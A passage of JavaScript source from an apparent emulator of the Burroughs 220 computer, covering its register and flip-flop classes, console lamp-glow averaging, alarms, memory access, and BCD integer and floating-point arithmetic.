0 ? 0 : (word - (word % B220Processor.pow2[ue]))); return (value % B220Processor.pow2[width])*bpower + top + bottom; }; /**************************************/ B220Processor.fieldTransfer = function fieldTransfer(word, wstart, width, value, vstart) { /* Inserts a bit field from value.[vstart:width] into word.[wstart:width] and returns the updated word */ var ue = wstart+1; // word upper power exponent var le = ue-width; // word lower power exponent var ve = vstart-width+1; // value lower power exponent var vpower; // bottom port of value power of 2 var bpower = // bottom portion of word power of 2 B220Processor.pow2[le]; var bottom = // unaffected bottom portion of word (le <= 0 ? 0 : (word % bpower)); var top = // unaffected top portion of word (ue <= 0 ? 0 : (word - (word % B220Processor.pow2[ue]))); return ((ve <= 0 ? value : (value - value % (vpower = B220Processor.pow2[ve]))/vpower ) % B220Processor.pow2[width] )*bpower + top + bottom; }; /*********************************************************************** * System Clear & Lamp Glow Management * ***********************************************************************/ /**************************************/ B220Processor.prototype.clear = function clear() { /* Initializes (and if necessary, creates) the processor state */ // Primary Registers this.A.set(0); this.B.set(0); this.C.set(0); this.D.set(0); this.E.set(0); this.P.set(0); this.R.set(0); this.S.set(0); this.IB.set(0); // Control Console Lamps this.digitCheckAlarm.set(0); this.systemNotReady.set(0); this.computerNotReady.set(0); this.compareLowLamp.set(0); this.compareEqualLamp.set(0); this.compareHighLamp.set(0); // Left-Hand Maintenance Panel Registers & Flip-Flops this.CI.set(0); this.DC.set(0); this.SC.set(0); this.SI.set(0); this.X.set(0); this.Y.set(0); this.Z.set(0); this.C10.set(0); this.DST.set(0); this.LT1.set(0); this.LT2.set(0); this.LT3.set(0); this.SCI.set(0); this.SGT.set(0); this.SUT.set(0); this.TBT.set(0); this.TCT.set(0); this.TPT.set(0); this.TWT.set(0); // Right-Hand Maintenance Panel Registers & Flip-Flops this.AX.set(0); this.BI.set(0); this.DX.set(0); this.PA.set(0); this.ALT.set(0); this.AST.set(0); this.CCT.set(0); this.CRT.set(0); this.DPT.set(0); this.EWT.set(0); this.EXT.set(this.FETCHEXECUTELOCKSW == 2 ? 1 : 0); this.HAT.set(0); this.HCT.set(0); this.HIT.set(0); this.MAT.set(0); this.MET.set(0); this.MNT.set(0); this.OFT.set(0); this.PAT.set(0); this.PRT.set(0); this.PZT.set(0); this.RPT.set(0); this.RUT.set(0); this.SST.set(0); this.TAT.set(0); this.UET.set(0); this.CCONTROL = 0; // copy of C register control digits (4 digits) this.COP = 0; // copy of C register op code (2 digits) this.CADDR = 0; // copy of C register operand address (4 digits) // I/O globals this.rDigit = 0; // variant/format digit from control part of instruction this.vDigit = 0; // variant digit from control part of instruction this.selectedUnit = 0; // currently-selected unit number // Kill any pending action that may be in process if (this.scheduler) { clearCallback(this.scheduler); this.scheduler = 0; } this.updateLampGlow(1); // initialize the lamp states }; /**************************************/ B220Processor.prototype.validateDigitCheck = function validateDigitCheck() { /* Steps through all of the properties of the Processor object, isolating the Register() objects and determining if any of them have a Forbidden Combination condition. If not, turns off the Digit Check alarm */ var alarm = false; // true if any register has FC var name = ""; // current property name var reg = null; // current Register object for (name in this) { reg = this[name]; if (reg instanceof B220Processor.Register) { if (reg.hasFC) { alarm = true; break; // out of for loop } } } // for name if (!alarm) { this.digitCheckAlarm.set(0); } }; /**************************************/ B220Processor.prototype.updateLampGlow = function updateLampGlow(beta) { /* Updates the lamp glow for all registers and flip-flops in the system. Beta is a bias in the range (0,1). For normal update use 0; to freeze the current state in the lamps use 1 */ var gamma = (this.RUT.value ? beta || 0 : 1); // First, check whether a Digit Check alarm exists and if the condition has resolved. if (this.digitCheckAlarm.value) { this.validateDigitCheck(); } // Primary Registers this.A.updateLampGlow(gamma); this.B.updateLampGlow(gamma); this.C.updateLampGlow(gamma); this.D.updateLampGlow(gamma); this.E.updateLampGlow(gamma); this.P.updateLampGlow(gamma); this.R.updateLampGlow(gamma); this.S.updateLampGlow(gamma); this.IB.updateLampGlow(gamma); // Control Console Lamps this.digitCheckAlarm.updateLampGlow(gamma); this.systemNotReady.updateLampGlow(gamma); this.computerNotReady.updateLampGlow(gamma); this.compareLowLamp.updateLampGlow(gamma); this.compareEqualLamp.updateLampGlow(gamma); this.compareHighLamp.updateLampGlow(gamma); // Left-Hand Maintenance Panel Registers & Flip-Flops if (this.leftPanelOpen) { this.CI.updateLampGlow(gamma); this.DC.updateLampGlow(gamma); this.SC.updateLampGlow(gamma); this.SI.updateLampGlow(gamma); this.X.updateLampGlow(gamma); this.Y.updateLampGlow(gamma); this.Z.updateLampGlow(gamma); this.C10.updateLampGlow(gamma); this.DST.updateLampGlow(gamma); this.LT1.updateLampGlow(gamma); this.LT2.updateLampGlow(gamma); this.LT3.updateLampGlow(gamma); this.SCI.updateLampGlow(gamma); this.SGT.updateLampGlow(gamma); this.SUT.updateLampGlow(gamma); this.TBT.updateLampGlow(gamma); this.TCT.updateLampGlow(gamma); this.TPT.updateLampGlow(gamma); this.TWT.updateLampGlow(gamma); } // Right-Hand Maintenance Panel Registers & Flip-Flops this.ALT.updateLampGlow(gamma); this.MET.updateLampGlow(gamma); this.TAT.updateLampGlow(gamma); this.PAT.updateLampGlow(gamma); this.CRT.updateLampGlow(gamma); this.HAT.updateLampGlow(gamma); this.EXT.updateLampGlow(gamma); this.OFT.updateLampGlow(gamma); this.RPT.updateLampGlow(gamma); this.RUT.updateLampGlow(gamma); if (this.rightPanelOpen) { this.AX.updateLampGlow(gamma); this.BI.updateLampGlow(gamma); this.DX.updateLampGlow(gamma); this.PA.updateLampGlow(gamma); this.AST.updateLampGlow(gamma); this.CCT.updateLampGlow(gamma); this.CRT.updateLampGlow(gamma); this.DPT.updateLampGlow(gamma); this.EWT.updateLampGlow(gamma); this.HCT.updateLampGlow(gamma); this.HIT.updateLampGlow(gamma); this.MAT.updateLampGlow(gamma); this.MNT.updateLampGlow(gamma); this.PRT.updateLampGlow(gamma); this.PZT.updateLampGlow(gamma); this.SST.updateLampGlow(gamma); this.UET.updateLampGlow(gamma); } }; /**************************************/ B220Processor.prototype.asyncOff = function asyncOff() { /* Updates the emulated processor clock while operating asynchronously during I/O so that glow averages can be updated based on elapsed time. Also used at the end of and I/O to synchronize the emulated clock with real time */ if (this.asyncTime < 0) { this.asyncTime += performance.now(); this.execClock += this.asyncTime; this.procSlack += this.asyncTime; // consider I/O time to be processor slack } }; /**************************************/ B220Processor.prototype.asyncOn = function asyncOn() { /* Sets this.asyncTime to start asynchronous timing for the processor during I/O */ if (this.asyncTime >= 0) { this.asyncTime = -performance.now(); } }; /**************************************/ B220Processor.prototype.procOff = function procOff() { /* Stops emulated internal run timing for the processor */ while (this.procTime < 0) { this.procTime += this.execClock; } }; /**************************************/ B220Processor.prototype.procOn = function procOn() { /* Starts emulated internal run timing for the processor */ while (this.procTime >= 0) { this.procTime -= this.execClock; } }; /*********************************************************************** * Generic Register Class * ***********************************************************************/ B220Processor.Register = function Register(bits, p, invisible) { /* Constructor for the generic Register class. Defines a binary register of "bits" bits. "p" is a reference to the Processor object, used to access the timing members. "invisible" should be true if the register does not have a visible presence in the UI -- this will inhibit computing average lamp glow values for the register. Note that it is important to increment this.execClock in the caller AFTER setting new values in registers and flip-flops. This allows the average intensity to be computed based on the amount of time a bit was actually in that state */ this.bits = bits; // number of bits in register this.visible = (invisible ? false : true); this.hasFC = false; // true if Forbidden Combination (A-F digit) detected this.lastExecClock = 0; // time register was last set this.p = p; // processor instance this.value = 0; // binary value of register: read-only externally this.glow = new Float64Array(bits); // average lamp glow values }; /**************************************/ B220Processor.Register.prototype.checkFC = function checkFC() { /* Checks the register for a Forbidden Combination (hex A-F) digit. If at least one exists, sets the Digit Check alarm and returns true. The bit mask operations are done 28 bits at a time to avoid problems with the 32-bit 2s-complement arithmetic used by Javascript for bit operations */ var hasFC = false; // true if register has Forbidden Combination var v1 = this.value; // high-order digits (eventually) var v2 = v1%0x10000000; // low-order 7 digits v1 = (v1-v2)/0x10000000; if (((v2 & 0x8888888) >>> 3) & (((v2 & 0x4444444) >>> 2) | ((v2 & 0x2222222) >>> 1))) { hasFC = true; } else if (v1 > 9) { if (((v1 & 0x8888888) >>> 3) & (((v1 & 0x4444444) >>> 2) | ((v1 & 0x2222222) >>> 1))) { hasFC = true; } } this.hasFC = hasFC; if (!hasFC) { return 0; } else { this.p.setDigitCheck(1); return 1; } }; /**************************************/ B220Processor.Register.prototype.updateLampGlow = function updateLampGlow(beta) { /* Updates the lamp glow averages based on this.p.execClock. Note that the glow is always aged by at least one clock tick. Beta is a bias in the range (0,1). For normal update, use 0; to freeze the current state, use 1 */ var alpha = Math.min(Math.max(this.p.execClock-this.lastExecClock, B220Processor.tick)/ B220Processor.maxGlowTime + beta, 1.0); var alpha1 = 1.0-alpha; var b = 0; var bit; var v = this.value; if (this.visible) { while (v) { bit = v % 2; v = (v-bit)/2; this.glow[b] = this.glow[b]*alpha1 + bit*alpha; ++b; } while (b < this.bits) { this.glow[b] *= alpha1; ++b; } } this.lastExecClock = this.p.execClock; }; /**************************************/ B220Processor.Register.prototype.set = function set(value) { /* Set a binary value into the register. Use this rather than setting the value member directly so that average lamp glow can be computed. Returns the new value */ this.value = value; if (this.visible) { this.updateLampGlow(0); } if (value > 9) { this.checkFC(); } else { this.hasFC = false; } return value; }; /**************************************/ B220Processor.Register.prototype.getDigit = function getDigit(digitNr) { /* Returns the value of a 4-bit digit in the register. Digits are numbered from 0 starting at the low end (not the way the 220 numbers them) */ return B220Processor.fieldIsolate(this.value, digitNr*4+3, 4); }; /**************************************/ B220Processor.Register.prototype.setDigit = function setDigit(digitNr, value) { /* Sets the value of a 4-bit digit in the register. Digits are numbered from 0 starting at the low end (not the way the 220 numbers them) */ return this.set(B220Processor.fieldInsert(this.value, digitNr*4+3, 4, value)); }; /**************************************/ B220Processor.Register.prototype.getBit = function getBit(bitNr) { /* Returns the value of a bit in the register */ return (bitNr < this.bits ? B220Processor.bitTest(this.value, bitNr) : 0); }; /**************************************/ B220Processor.Register.prototype.setBit = function setBit(bitNr, value) { /* Set a bit on or off in the register. Returns the new register value. Note that the glow is always aged by at least one clock tick */ var alpha = Math.min(Math.max(this.p.execClock-this.lastExecClock, B220Processor.tick)/ B220Processor.maxGlowTime, 1.0); var bit = (value ? 1 : 0); if (bitNr < this.bits) { // Update the lamp glow for the former state. if (this.visible) { this.glow[bitNr] = this.glow[bitNr]*(1.0-alpha) + bit*alpha; } // Set the new state. this.value = (bit ? B220Processor.bitSet(this.value, bitNr) : B220Processor.bitReset(this.value, bitNr)); } this.checkFC(); return this.value; }; /**************************************/ B220Processor.Register.prototype.flipBit = function flipBit(bitNr) { /* Complements a bit in the register. Returns the new register value. Note that the glow is always aged by at least one clock tick */ var alpha = Math.min(Math.max(this.p.execClock-this.lastExecClock, B220Processor.tick)/ B220Processor.maxGlowTime, 1.0); var bit; if (bitNr < this.bits) { bit = 1 - B220Processor.bitTest(this.value, bitNr); // Update the lamp glow for the former state. if (this.visible) { this.glow[bitNr] = this.glow[bitNr]*(1.0-alpha) + bit*alpha; } // Set the new state. this.value = B220Processor.bitFlip(this.value, bitNr); } this.checkFC(); return this.value; }; /**************************************/ B220Processor.Register.prototype.add = function add(addend) { /* Adds "addend" to the current register value without regard to sign, discarding any overflow beyond the number of bits defined for the register. Returns the new register value. NOTE THAT THE ADDEND IS IN BCD, NOT BINARY. Also note that this uses the 220 adder, so generally do not use this for simple increment of address and counter registers -- use .inc() instead */ var digits = (this.bits+3) >> 2; return this.set(this.p.bcdAdd(this.value, addend, digits) % B220Processor.pow2[this.bits]); }; /**************************************/ B220Processor.Register.prototype.sub = function sub(subtrahend) { /* Subtracts "subtrahend" from the current register value without regard to sign, discarding any overflow beyond the number of bits defined for the register. Returns the new register value. NOTE THAT THE ADDEND IS IN BCD, NOT BINARY. Also note that this uses the 220 adder, so generally do not use this for simple decrement of address and counter registers -- use .dec() instead */ var digits = (this.bits+3) >> 2; return this.set(this.p.bcdAdd(subtrahend, this.value, digits, 1, 1) % B220Processor.pow2[this.bits]); }; /**************************************/ B220Processor.Register.prototype.inc = function inc() { /* Increments the register by 1 using BCD arithmetic and returns the new register value. This method does not use the 220 adder, so is safe to use for incrementing address and counter registers during instructions. Any overflow is discarded and the register wraps around to zero */ var d = this.value%0x10; // current low-order digit var maxPower = B220Processor.pow2[this.bits]; var power = 1; // factor for current digit position var w = this.value; // working copy of register value while (d == 9 && power < maxPower) {// while a carry would be generated this.value -= 9*power; // change this digit to a zero power *= 0x10; // bump power for next digit w = (w-d)/0x10; // shift working copy down d = w%0x10; // isolate the next digit } if (d < 9) { this.value += power; // increment the first digit that will not generate carry } return this.set(this.value % B220Processor.pow2[this.bits]); }; /**************************************/ B220Processor.Register.prototype.dec = function dec() { /* Decrements the register by 1 using BCD arithmetic and returns the new register value. This method does not use the 220 adder, so is safe to use for decrementing address and counter registers during instructions. Any underflow is discarded and the register wraps around to all-nines */ var d = this.value%0x10; // current low-order digit var maxPower = B220Processor.pow2[this.bits]; var power = 1; // factor for current digit position var w = this.value; // working copy of register value while (d == 0 && power < maxPower) {// while a borrow would be generated this.value += 9*power; // change this digit to a 9 power *= 0x10; // bump power for next digit w = (w-d)/0x10; // shift working copy down d = w%0x10; // isolate the next digit } if (d > 0) { this.value -= power; // decrement the first digit that will not generate a borrow } return this.set(this.value % maxPower); }; /*********************************************************************** * Generic Flip-Flop Class * ***********************************************************************/ B220Processor.FlipFlop = function FlopFlop(p, invisible) { /* Constructor for the generaic FlipFlop class. "p" is a reference to the Processor object, used to access the timing members. "invisible" should be true if the FF does not have a visible presence in the UI -- this will inhibit computing the average lamp glow value for it. Note that it is important to increment this.execClock in the caller AFTER setting new values in registers and flip-flops. This allows the average intensity to be computed based on the amount of time a bit was actually in that state */ this.visible = (invisible ? false : true); this.lastExecClock = 0; // time register was last set this.p = p; // processor instance this.value = 0; // binary value of register: read-only externally this.glow = 0; // average lamp glow value }; /**************************************/ B220Processor.FlipFlop.prototype.updateLampGlow = function updateLampGlow(beta) { /* Updates the average glow for the flip flop. Note that the glow is always aged by at least one clock tick. Beta is a bias in the range (0,1). For normal update, use 0; to freeze the current state, use 1. Returns the new average */ var alpha = Math.min(Math.max(this.p.execClock-this.lastExecClock, B220Processor.tick)/ B220Processor.maxGlowTime + beta, 1.0); if (this.visible) { this.glow = this.glow*(1.0-alpha) + this.value*alpha; } this.lastExecClock = this.p.execClock; return this.glow; }; /**************************************/ B220Processor.FlipFlop.prototype.set = function set(value) { /* Set the value of the FF. Use this rather than setting the value member directly so that average lamp glow can be computed. Returns the new value */ this.value = (value ? 1 : 0); if (this.visible) { this.updateLampGlow(0); } return value; }; /**************************************/ B220Processor.FlipFlop.prototype.flip = function flip() { /* Complement the value of the FF. Returns the new value */ return this.set(1-this.value); }; /*********************************************************************** * System Alarms * ***********************************************************************/ /**************************************/ B220Processor.prototype.setDigitCheck = function setDigitCheck(value) { /* Sets the Digit Check alarm */ if (!this.ALARMSW && !this.DIGITCHECKSW) { this.digitCheckAlarm.set(value); if (value) { this.setStop(); this.SST.set(1); // stop at end of current cycle } } }; /**************************************/ B220Processor.prototype.setProgramCheck = function setProgramCheck(value) { /* Sets the Program Check alarm */ if (!this.ALARMSW) { this.ALT.set(value); if (value) { this.setStop(); } } }; /**************************************/ B220Processor.prototype.setStorageCheck = function setStorageCheck(value) { /* Sets the Storage Check alarm */ if (!this.ALARMSW) { this.MET.set(value); if (value) { this.setStop(); this.SST.set(1); // stop at end of current cycle } } }; /**************************************/ B220Processor.prototype.setMagneticTapeCheck = function setMagneticTapeCheck(value) { /* Sets the Magnetic Tape Check alarm */ if (!this.ALARMSW) { this.TAT.set(value); if (value) { this.setStop(); } } }; /**************************************/ B220Processor.prototype.setCardatronCheck = function setCardatronCheck(value) { /* Sets the Cardatron Check alarm */ if (!this.ALARMSW) { this.CRT.set(value); if (value) { this.setStop(); } } }; /**************************************/ B220Processor.prototype.setPaperTapeCheck = function setPaperTapeCheck(value) { /* Sets the Paper Tape Check alarm */ if (!this.ALARMSW) { this.PAT.set(value); if (value) { this.setStop(); } } }; /**************************************/ B220Processor.prototype.setHighSpeedPrinterCheck = function setHighSpeedPrinterCheck(value) { /* Sets the High Speed Printer Check alarm */ if (!this.ALARMSW) { this.HAT.set(value); if (value) { this.setStop(); } } }; /*********************************************************************** * Memory Access * ***********************************************************************/ /**************************************/ B220Processor.prototype.readMemory = function readMemory() { /* Reads the contents of one word of memory into the IB register from the address in the E register. Sets the Storage Check alarm if the address is not valid. Returns the word fetched, or the current value of IB if invalid address */ var addr = B220Processor.bcdBinary(this.E.value); if (isNaN(addr)) { this.setStorageCheck(1); return this.IB.value; } else if (addr >= this.memorySize) { this.setStorageCheck(1); return this.IB.value; } else if (this.MEMORYLOCKOUTSW) { return this.IB.set(this.D.value); } else { return this.IB.set(this.MM[addr]); } }; /**************************************/ B220Processor.prototype.writeMemory = function writeMemory() { /* Stores one word of memory from the IB register to the address in the E register. Sets the Storage Check alarm if the address is not valid */ var addr = B220Processor.bcdBinary(this.E.value); if (isNaN(addr)) { this.setStorageCheck(1); } else if (addr >= this.memorySize) { this.setStorageCheck(1); } else if (this.MEMORYLOCKOUTSW) { this.D.set(this.IB.value); } else { this.MM[addr] = this.IB.value; } }; /*********************************************************************** * The 220 Adder and Arithmetic Operations * ***********************************************************************/ /**************************************/ B220Processor.prototype.bcdAdd = function bcdAdd(a, d, digits, complement, initialCarry) { /* Returns an unsigned, BCD addition of "a" and "d", producing "digits" of BCD result. Any higher-order digits and any overflow are discarded. Maximum capacity in Javascript (using IEEE 64-bit floating point) is 14 digits. On input, "complement" indicates whether 9s-complement addition should be performed; "initialCarry" indicates whether an initial carry of 1 should be applied to the adder. On output, this.CI is set from the final carry toggles of the addition and this.C10 will have the carry toggle. Further, this.Z will still have a copy of the sign (high-order) digit. Sets the Program Check alarm if non-decimal digits are encountered, but does not set the Overflow toggle */ var ad; // current augend (a) digit; var adder; // local copy of adder digit var am = a % B220Processor.pow2[digits*4]; // augend mantissa var carry = (initialCarry || 0) & 1;// local copy of carry toggle (CI1, CAT) var compl = complement || 0; // local copy of complement toggle var ct = carry; // local copy of carry register (CI1-16) var dd; // current addend (d) digit; var dm = d % B220Processor.pow2[digits*4]; // addend mantissa var shiftPower = B220Processor.pow2[(digits-1)*4]; // to position high-order digit var x; // digit counter // Loop through the digits for (x=0; x<digits; ++x) { // shift low-order augend digit right into the adder ad = am % 0x10; am = (am - ad)/0x10; this.X.set(ad); // tests for FC if (compl) { ad = 9-ad; } // Add the digits plus carry, complementing as necessary dd = dm % 0x10; this.Y.set(dd); // tests for FC adder = ad + dd + carry; // Decimal-correct the adder if (adder < 10) { carry = 0; } else { adder -= 10; carry = 1; } // Compute the carry toggle register (just for display) ct = (((ad & dd) | (ad & ct) | (dd & ct)) << 1) + carry; // Update the visible registers (for display only) this.Z.set(adder); // tests for FC this.C10.set(carry); this.CI.set(ct); this.SI.set(0x0F ^ ct); // just a guess as to the sum inverters // rotate the adder into the high-order digit am += adder*shiftPower; // shift the addend right to the next digit dm = (dm - dd)/0x10; } // for x return am; }; /**************************************/ B220Processor.prototype.clearAdd = function clearAdd(absolute) { /* After accessing memory, algebraically add the addend (IB) to zero. If "absolute" is true, then the sign-bit of the word from memory is forced to the subtract toggle. All values are BCD with the sign in the 11th digit position. Sets the Digit Check alarm as necessary */ var am = 0; // augend mantissa var dm; // addend mantissa var dSign; // addend sign this.opTime = 0.095; this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address this.A.set(am); // sign is zero return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000); if (absolute) { // force sign bit to SUT dSign = (dSign & 0x0E) | this.SUT.value; } else if (this.SUT.value) { // complement the sign bit dSign = dSign ^ 0x01; } am = this.bcdAdd(am, dm, 11); // Set toggles for display purposes and return the result this.DST.set(dSign%2); this.SGT.set(dSign%2); this.D.set(dSign*0x10000000000 + dm); this.A.set(dSign*0x10000000000 + am); }; /**************************************/ B220Processor.prototype.integerAdd = function integerAdd(absolute, toD) { /* After accessing memory, algebraically add the addend (IB) to the augend (A). If "absolute" is true, then the sign of the word from memory is forced to zero. If "toD" is false, the result will be left in A, and D will contain a copy of the word from memory with the three high-order bits of its sign set to zero. If "toD" is true, the result will be left in D, and A will not be altered, except than the three high-order bits of its sign digit will be set to zero. Note that if the value of the result is zero, its sign will be the original sign of A. All values are BCD with the sign in the 11th digit position. Sets the Overflow and Digit Check alarms as necessary */ var am = this.A.value % 0x10000000000; // augend mantissa var aSign = ((this.A.value - am)/0x10000000000)%2; var compl; // complement addition required var dm; // addend mantissa var dSign; // addend sign var sign; // local copy of sign toggle var timing = 0.095; this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address this.A.set(am); // sign is zero return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; sign = (absolute ? 0 : dSign); if (this.SUT.value) { sign = 1-sign; // complement sign for subtraction } compl = (aSign^sign); am = this.bcdAdd(am, dm, 11, compl, compl); // Now examine the resulting sign (still in the adder) to see if we have overflow // or need to recomplement the result switch (this.Z.value) { case 0: am += sign*0x10000000000; break; case 1: am += (sign-1)*0x10000000000; this.OFT.set(1); break; default: // sign is 9 // reverse the sign toggle and recomplement the result (virtually adding to the zeroed dm) sign = 1-sign; am = this.bcdAdd(am, 0, 11, 1, 1); // after recomplementing, set the correct sign (adder still contains sign of result) am += (sign - this.Z.value)*0x10000000000; timing += 0.060; break; } // switch this.Z.value if (am%0x10000000000 == 0) { am = aSign*0x10000000000; } // Set toggles for display purposes and return the result this.DST.set(dSign); this.SGT.set(sign); if (toD) { this.D.set(am); this.A.set(this.A.value%0x20000000000); } else { this.D.set(dSign*0x10000000000 + dm); this.A.set(am); } this.opTime = timing; }; /**************************************/ B220Processor.prototype.integerExtract = function integerExtract() { /* "Extract" digits from A according to the digit pattern in IB. If a pattern digit is even, then the corresponding digit in the value is set to zero. If the pattern digit is odd, then the corresponding value digit is not changed. Overflow is not possible, but a Digit Check alarm can occur */ var ad; // current value (A) digit; var am = this.A.value; // value mantissa var dd; // current pattern (D) digit; var dm; // pattern mantissa var x; // digit counter this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address return; // exit to Operation Complete } // Loop through the 11 digits including signs dm = this.IB.value; for (x=0; x<11; ++x) { // shift low-order value digit right into the adder ad = am % 0x10; am = (am - ad)/0x10; this.X.set(ad); // tests for FC // shift low-order pattern digit into the adder dd = dm % 0x10; dm = (dm - dd)/0x10; this.Y.set(dd); // tests for FC if (dd%2) { // if extract digit is odd this.Z.set(ad); // keep the value digit } else { // otherwise, if it's even ad = 0; // clear the value digit this.Z.set(0); } // rotate the digit into the result am += ad*0x10000000000; } // for x // Set toggles for display purposes and return the result this.A.set(am); this.D.set(this.IB.value); this.opTime = 0.145; }; /**************************************/ B220Processor.prototype.integerMultiply = function integerMultiply() { /* Algebraically multiply the multiplicand (IB) by the multiplier (A), producing a 20-digit product in A and R. Final sign of R will be final sign of A. All values are BCD with the sign in the 11th digit position. Sets Forbidden- Combination stop as necessary. Overflow is not possible */ var ad; // current product (A) digit; var am = this.A.value % 0x10000000000; // product (A) mantissa var aSign = ((this.A.value - am)/0x10000000000)%2; var count = 0; // count of multiply cycles var dm; // multiplicand mantissa var dSign; // sign of multiplicand var rc; // dup of rd for add counting var rd; // current multipler (R) digit; var rm = am; // current multiplier (R) mantissa var sign; // local copy of sign toggle (sign of product) var x; // digit counter this.SUT.set(0); this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address this.A.set(am); // sign is zero this.R.set(0); return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; sign = aSign ^ dSign; am = 0; // clear the local product (A) mantissa // We now have the multiplicand in D (dm), the multiplier in R (rm), and an // initial product of zero in A (am). Go through a classic multiply cycle, // doing repeated addition based on each multipler digit, and between digits // shifting the product (in am and rm) one place to the right. After 10 digits, // we're done. The 220 probably did a combination of addition and subtraction, // depending on whether the current multiplier digit was >5, to minimize the // number of addition cycles. We don't care how long this takes internally, // the the following mechanization uses the simple way. for (x=0; x<10; ++x) { rd = rm % 0x10; count += B220Processor.multiplyDigitCounts[rd]; for (rc=rd; rc>0; --rc) { // repeated addition am = this.bcdAdd(am, dm, 11, 0, 0); } ad = am % 0x10; am = (am-ad)/0x10; rm = (rm-rd)/0x10 + ad*0x1000000000; } // for x this.DST.set(dSign); this.SGT.set(sign); this.A.set(sign*0x10000000000 + am); this.R.set(sign*0x10000000000 + rm); this.D.set(dSign*0x10000000000 + dm); this.opTime = 0.090 + 0.005*count; }; /**************************************/ B220Processor.prototype.integerDivide = function integerDivide() { /* Algebraically divide the dividend (A & R) by the divisor (IB), producing a signed 10-digit quotient in A and the remainder in R. All values are BCD with the sign in the 11th digit position. Sets Digit Check alarm as necessary. If the magnitude of the divisor (IB) is less or equal to the magnitude of the dividend (A), Overflow is set and division terminates */ var am = this.A.value % 0x10000000000; // current remainder (A) mantissa var aSign = ((this.A.value - am)/0x10000000000)%2; var count = 0; // count of divide cycles var dm; // divisor mantissa var dSign; // sign of divisior var rd; // current quotient (R) digit; var rm = this.R.value%0x10000000000;// current quotient (R) mantissa (ignore sign) var rSign = (this.R.value - rm)/0x10000000000; // R register sign (restored later) var sign; // local copy of sign toggle (sign of quotient) var tSign = 1; // sign for timing count accumulation var x; // digit counter this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address this.A.set(am); // sign is zero this.R.set(aSign*0x10000000000 + rm); return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; sign = aSign ^ dSign; this.DST.set(dSign); this.SGT.set(sign); this.SUT.set(1); // We now have the divisor in D (dm) and the dividend in A (am) & R (rm). // The value in am will become the remainder; the value in rm will become // the quotient. Go through a classic long-division cycle, repeatedly // subtracting the divisor from the dividend, counting subtractions until // underflow occurs, and shifting the divisor left one digit. // The 220 probably did not work quite the way that it has been mechanized // below, which is close to the way the 205 worked. The funny way that timing // for division could be calculated from the differences of alternate quotient // digits (see the Operational Characteristics manual, 5020A, August 1960, p.212) // suggests that something clever was going on with the 220 divide implementation. if (this.bcdAdd(dm, am, 11, 1, 1) < 0x10000000000) { this.OFT.set(1); this.A.set(aSign*0x10000000000 + am); this.R.set(rSign*0x10000000000 + rm); this.D.set(this.IB.value); this.opTime = 0.090; } else { for (x=0; x<10; ++x) { // First, shift A & R to the left one digit, with A1 shifting to ASGN rd = (rm - rm%0x1000000000)/0x1000000000; rm = (rm%0x1000000000)*0x10; am = am*0x10 + rd; // Now repeatedly subtract D from A until we would get underflow. rd = 0; while (am >= dm) { am = this.bcdAdd(dm, am, 11, 1, 1); ++rd; count += tSign; } rm += rd; // move digit into quotient tSign = -tSign; } // for x this.A.set(sign*0x10000000000 + rm); // rotate final values in A & R this.R.set(aSign*0x10000000000 + am); this.D.set(dSign*0x10000000000 + dm); this.opTime = 3.805 + 0.060*count; } }; /**************************************/ B220Processor.prototype.floatingAdd = function floatingAdd(absolute) { /* Algebraically add the floating-point addend (IB) to the floating-point augend (A), placing the result in A and clearing D. The R register is not affected. All values are BCD with the sign in the 11th digit position. The floating exponent is in the first two digit positions, biased by 50. Sets Overflow and the Digit Check alarm as necessary. For more on the use of the limiter digit in C/11 and the mechanization of floating add/subtract on the 220, see United States Patent 3,022,006, 1962-02-20 */ var ax; // augend exponent (binary) var am = this.A.value % 0x10000000000; // augend mantissa (BCD) var aSign = ((this.A.value - am)/0x10000000000)%2; var compl; // complement addition required var d; // scratch digit; var dx; // addend exponent (binary) var dm; // addend mantissa (BCD) var dSign; // addend sign var limiter = 0; // normalizing limiter var shifts = 0; // number of scaling/normalization shifts done var sign; // local copy of sign toggle var timing = 0.125; // minimum instruction timing var zeroed = false; // true if either operand normalizes to zero this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; sign = (absolute ? 0 : dSign); if (this.SUT.value) { sign = 1-sign; // complement sign for subtraction } ax = (am - am%0x100000000)/0x100000000; am %= 0x100000000; dx = (dm - dm%0x100000000)/0x100000000; dm %= 0x100000000; // If the exponents are unequal, scale the smaller // until they are in alignment, or one mantissa becomes zero. // Scale D until its exponent matches or the mantissa goes to zero. while (ax > dx) { timing += 0.010; dx = this.bcdAdd(1, dx, 2, 0, 0); // ++dx d = dm % 0x10; dm = (dm - d)/0x10; // shift D right if (dm == 0) { zeroed = true; sign = aSign; // result is value in A break; } } // Scale A until its exponent matches or the mantissa goes to zero. while (ax < dx) { timing += 0.010; ax = this.bcdAdd(1, ax, 3, 0, 0); // ++ax d = am % 0x10; am = (am - d)/0x10; // shift A right if (am == 0) { zeroed = true; am = dm; // result is value in D with adjusted sign ax = dx; dSign = 0; break; } } // Add the mantissas if (!zeroed) { compl = (aSign^sign); am = this.bcdAdd(am, dm, 11, compl, compl); // Now examine the resulting sign (still in the adder) to see if there // is a carry and we need to recomplement the result and sign. if (this.Z.value) { // Reverse the sign toggle and recomplement the result. sign = 1-sign; am = this.bcdAdd(am, 0, 11, 1, 1); timing += 0.060; } dm = dSign = 0; // Set D to its strange result value dx = 0x10; // Normalize or scale the result as necessary if (am >= 0x100000000) { // Mantissa overflow: add/subtract can produce at most one digit of // overflow, so scale by shifting right and incrementing the exponent, // checking for overflow in the exponent. if (ax < 0x99) { timing += 0.005; ax = this.bcdAdd(1, ax, 3, 0, 0); // ++ax d = am % 0x10; am = (am - d)/0x10; // shift A right } else { // A scaling shift would overflow the exponent, so set the overflow // toggle and leave the mantissa as it 